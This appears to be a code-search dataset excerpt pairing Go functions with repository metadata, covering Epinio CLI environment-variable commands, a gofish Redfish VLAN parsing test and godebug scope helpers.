func (c *EchoClient) Block(ctx context.Context, req *genprotopb.BlockRequest, opts ...gax.CallOption) (*genprotopb.BlockResponse, error) {
return c.internalClient.Block(ctx, req, opts...)
}
func (c *EchoClient) ListLocations(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) *LocationIterator {
return c.internalClient.ListLocations(ctx, req, opts...)
} | Apache License 2.0 |
epinio/epinio | internal/cli/usercmd/env.go | EnvMatching | go | func (c *EpinioClient) EnvMatching(ctx context.Context, appName, prefix string) []string {
log := c.Log.WithName("Env")
log.Info("start")
defer log.Info("return")
resp, err := c.API.EnvMatch(c.Config.Org, appName, prefix)
if err != nil {
return []string{}
}
return resp.Names
} | EnvMatching retrieves all environment variables in the cluster, for
the specified application, and the given prefix | https://github.com/epinio/epinio/blob/de61af94fdad363d030828c72c4c2f469364c234/internal/cli/usercmd/env.go#L128-L140 | package usercmd
import (
"context"
"github.com/epinio/epinio/pkg/api/core/v1/models"
)
func (c *EpinioClient) EnvList(ctx context.Context, appName string) error {
log := c.Log.WithName("EnvList")
log.Info("start")
defer log.Info("return")
c.ui.Note().
WithStringValue("Namespace", c.Config.Org).
WithStringValue("Application", appName).
Msg("Show Application Environment")
if err := c.TargetOk(); err != nil {
return err
}
eVariables, err := c.API.EnvList(c.Config.Org, appName)
if err != nil {
return err
}
msg := c.ui.Success().WithTable("Variable", "Value")
for _, ev := range eVariables.List() {
msg = msg.WithTableRow(ev.Name, ev.Value)
}
msg.Msg("Ok")
return nil
}
func (c *EpinioClient) EnvSet(ctx context.Context, appName, envName, envValue string) error {
log := c.Log.WithName("Env")
log.Info("start")
defer log.Info("return")
c.ui.Note().
WithStringValue("Namespace", c.Config.Org).
WithStringValue("Application", appName).
WithStringValue("Variable", envName).
WithStringValue("Value", envValue).
Msg("Extend or modify application environment")
if err := c.TargetOk(); err != nil {
return err
}
request := models.EnvVariableMap{}
request[envName] = envValue
_, err := c.API.EnvSet(request, c.Config.Org, appName)
if err != nil {
return err
}
c.ui.Success().Msg("OK")
return nil
}
func (c *EpinioClient) EnvShow(ctx context.Context, appName, envName string) error {
log := c.Log.WithName("Env")
log.Info("start")
defer log.Info("return")
c.ui.Note().
WithStringValue("Namespace", c.Config.Org).
WithStringValue("Application", appName).
WithStringValue("Variable", envName).
Msg("Show application environment variable")
if err := c.TargetOk(); err != nil {
return err
}
eVariable, err := c.API.EnvShow(c.Config.Org, appName, envName)
if err != nil {
return err
}
c.ui.Success().
WithStringValue("Value", eVariable.Value).
Msg("OK")
return nil
}
func (c *EpinioClient) EnvUnset(ctx context.Context, appName, envName string) error {
log := c.Log.WithName("Env")
log.Info("start")
defer log.Info("return")
c.ui.Note().
WithStringValue("Namespace", c.Config.Org).
WithStringValue("Application", appName).
WithStringValue("Variable", envName).
Msg("Remove from application environment")
if err := c.TargetOk(); err != nil {
return err
}
_, err := c.API.EnvUnset(c.Config.Org, appName, envName)
if err != nil {
return err
}
c.ui.Success().Msg("OK")
return nil
} | Apache License 2.0 |
stmcginnis/gofish | redfish/vlannetworkinterface_test.go | TestVlanNetworkInterface | go | func TestVlanNetworkInterface(t *testing.T) {
var result VLanNetworkInterface
err := json.NewDecoder(strings.NewReader(vlanNetworkInterfaceBody)).Decode(&result)
if err != nil {
t.Errorf("Error decoding JSON: %s", err)
}
if result.ID != "VlanNetworkInterface-1" {
t.Errorf("Received invalid ID: %s", result.ID)
}
if result.Name != "VlanNetworkInterfaceOne" {
t.Errorf("Received invalid name: %s", result.Name)
}
if !result.VLANEnable {
t.Error("VLAN should be enabled")
}
if result.VLANID != 200 {
t.Errorf("Invalid VLAN ID: %d", result.VLANID)
}
} | TestVlanNetworkInterface tests the parsing of VlanNetworkInterface objects. | https://github.com/stmcginnis/gofish/blob/d33a9c3efa5e173d33618942c693c094f587b3ac/redfish/vlannetworkinterface_test.go#L27-L50 | package redfish
import (
"encoding/json"
"strings"
"testing"
"github.com/stmcginnis/gofish/common"
)
var vlanNetworkInterfaceBody = `{
"@odata.context": "/redfish/v1/$metadata#VlanNetworkInterface.VlanNetworkInterface",
"@odata.type": "#VLanNetworkInterface.v1_1_3.VLanNetworkInterface",
"@odata.id": "/redfish/v1/VlanNetworkInterface",
"Id": "VlanNetworkInterface-1",
"Name": "VlanNetworkInterfaceOne",
"Description": "VlanNetworkInterface One",
"VLANEnable": true,
"VLANId": 200
}` | BSD 3-Clause New or Revised License |
mailgun/godebug | lib/env.go | EnteringNewChildScope | go | func (s *Scope) EnteringNewChildScope() *Scope {
return &Scope{
Vars: make(map[string]interface{}),
Consts: make(map[string]interface{}),
Funcs: make(map[string]interface{}),
parent: s,
fileText: s.fileText,
}
} | EnteringNewChildScope returns a new Scope that is the
child of s and internally sets the current scope to be
the returned scope. | https://github.com/mailgun/godebug/blob/bfb01ae9c26601793d8cf00f074489f7ad52288a/lib/env.go#L47-L55 | package godebug
import (
"fmt"
"reflect"
"strings"
"github.com/mailgun/godebug/Godeps/_workspace/src/github.com/0xfaded/eval"
)
type Scope struct {
Vars, Consts, Funcs map[string]interface{}
parent *Scope
fileText []string
}
func EnteringNewFile(parent *Scope, fileText string) *Scope {
return &Scope{
Vars: make(map[string]interface{}),
Consts: make(map[string]interface{}),
Funcs: make(map[string]interface{}),
parent: parent,
fileText: parseLines(fileText),
}
}
func parseLines(text string) []string {
lines := strings.Split(text, "\n")
if len(lines) > 0 && lines[len(lines)-1] == "" {
lines = lines[:len(lines)-1]
}
return lines
} | Apache License 2.0 |